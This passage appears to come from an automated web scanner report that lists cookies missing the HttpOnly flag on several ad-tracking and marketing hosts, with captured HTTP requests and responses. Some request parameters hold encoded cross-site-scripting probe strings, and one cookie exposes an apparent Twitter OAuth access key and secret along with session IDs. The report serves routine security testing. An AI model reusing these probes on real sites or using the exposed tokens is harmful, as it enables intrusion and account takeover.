User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:15:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2244faedc66a39c1cd79431d85e71d4605%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426907%3B%7D3702409268ba35be0558c532b9e1e58b; expires=Sat, 23-Jul-2011 15:15:07 GMT; path=/
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2244faedc66a39c1cd79431d85e71d4605%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426907%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A1%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3B%7D%7Db7d80dd75ac666f6707937027ace3c9e; expires=Sat, 23-Jul-2011 15:15:07 GMT; path=/
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2244faedc66a39c1cd79431d85e71d4605%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426907%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D0a6d283a0326461bdbd4f6ee1617d88c; expires=Sat, 23-Jul-2011 15:15:07 GMT; path=/
X-Powered-By: PleskLin
Content-Type: text/html
Content-Length: 47903

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8">
   <meta name="robots" content="index, follow" />
           <meta name="title" content="0"/>
               <title>Sea Shepherd :: Emergency SOS from Captai
...[SNIP]...

11.35. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/preferences_sf/prepopulateFields.js.sp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=180ulrg842i9botpaotddl8pl2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName&fld[]=LastName&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364652649 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:57:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=180ulrg842i9botpaotddl8pl2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 264
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName': '',
'LastName': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',

...[SNIP]...

11.36. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://204.124.80.52
Path:	/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zMTY3NTMyNjA4LjMwMTY0OTI3AAAAAAABAAAAAQAAANNNKE7TTShOAQAAAAEAAADTTShO000oTgAAAAA-; path=/; expires=Sun, 18-Jul-2021 16:03:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif?&dcsdat=1311264211912&dcssip=www.datacard.com&dcsuri=/&dcsqry=%3Faaaa=bbbb%22%3Ess%26ccc=dddd%2611111=22222&dcsref=http://www.fakereferrerdominator.com/referrerPathName%3FRefParName=RefValue&WT.ti=ID%20Card%20Printers%20%26%20Card%20Issuance%20Solutions%20-%20government%20ID%20cards%20%26%20financial%20cards%20|%20Datacard&WT.dc_date=1311264198235&WT.site=id&WT.ids_pt=home HTTP/1.1
Host: 204.124.80.52
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.datacard.com/

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Mon, 28 Jan 2002 14:51:42 GMT
Accept-Ranges: bytes
ETag: "013394cba8c11:621"
Server: Microsoft-IIS/6.0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zMTY3NTMyNjA4LjMwMTY0OTI3AAAAAAABAAAAAQAAANNNKE7TTShOAQAAAAEAAADTTShO000oTgAAAAA-; path=/; expires=Sun, 18-Jul-2021 16:03:31 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Thu, 21 Jul 2011 16:03:31 GMT
Connection: close

GIF89a.............!.......,...........D..;

11.37. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; expires=Thu, 18-Aug-2011 18:00:50 GMT; path=/; domain=.collective-media.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.38. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuT52nEybE7VWU6MyBF%2BwKSbZMx03f%2Fw0xF0izK%2B%2Fg6d%2Bw%3D%3D; expires=Fri, 20-Jan-2012 18:01:17 GMT; path=/
evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:17 GMT; path=/; domain=.netmng.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

11.39. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=a6nunmMZaACwDqGpS72crs95D7gxA9FljeQtdXZcgd4PKLao2vyvKW8Kn1jO4ghqfnIZaOTmZbJVrNZcqxd3ZbYwcSnyEteZdZcEZbPV1CPPY; path=/; domain=.tribalfusion.com; expires=Wed, 19-Oct-2011 18:00:38 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.40. http://a1.interclick.com/ColDta.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/ColDta.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tpd=e20=1313868322752&e90=1311881122837&e50=1313868323966&e100=1311881124049; domain=.interclick.com; expires=Sat, 20-Aug-2011 19:25:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.41. http://a1.interclick.com/getInPageJSProcess.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FC_53=180684=17624151:1; domain=.a1.interclick.com; expires=Fri, 22-Jul-2011 19:24:57 GMT; path=/
IFC=n=1&w51114=1&a180684=1&e=634469450978326444; domain=.a1.interclick.com; expires=Fri, 22-Jul-2011 19:24:57 GMT; path=/
Aqprep_Banner728X90=180684=634468586978356444:51114; domain=.a1.interclick.com; expires=Wed, 19-Oct-2011 19:24:57 GMT; path=/
Li=1=734338&30=734338; domain=.a1.interclick.com; expires=Sat, 20-Aug-2011 19:24:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=53&b=51114&cid=634206663009846585&isif=t&rurld=www.lifescript.com&sl=false&dvp=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&rurl=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult HTTP/1.1
Host: a1.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=101352252258050
Cookie: T=1; uid=u=7e1f4d20-a8f4-40d3-9d87-6cf2443de920; Aqprep_Banner160X600=160022=634406941334755622:51445; sgm=7472=734338

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=0; domain=.a1.interclick.com; expires=Sun, 31-Jul-2011 19:24:57 GMT; path=/
Set-Cookie: FC_53=180684=17624151:1; domain=.a1.interclick.com; expires=Fri, 22-Jul-2011 19:24:57 GMT; path=/
Set-Cookie: IFC=n=1&w51114=1&a180684=1&e=634469450978326444; domain=.a1.interclick.com; expires=Fri, 22-Jul-2011 19:24:57 GMT; path=/
Set-Cookie: Aqprep_Banner728X90=180684=634468586978356444:51114; domain=.a1.interclick.com; expires=Wed, 19-Oct-2011 19:24:57 GMT; path=/
Set-Cookie: Li=1=734338&30=734338; domain=.a1.interclick.com; expires=Sat, 20-Aug-2011 19:24:57 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:24:57 GMT
Content-Length: 836

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4%3Bsz%3D728x90%3Bpc%3D%3Bclick%3Dhttp%3A//a1.interclick.co
...[SNIP]...

11.42. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4146544210108361256; Domain=.turn.com; Expires=Thu, 19-Jan-2012 04:49:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.43. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:57 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:57 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=3996838049712860404&fpid=1&nu=n&t=
...[SNIP]...

11.44. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%2!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-lG!!!!#=-A%4!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Sun, 21-Jul-2013 20:31:12 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1306570&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!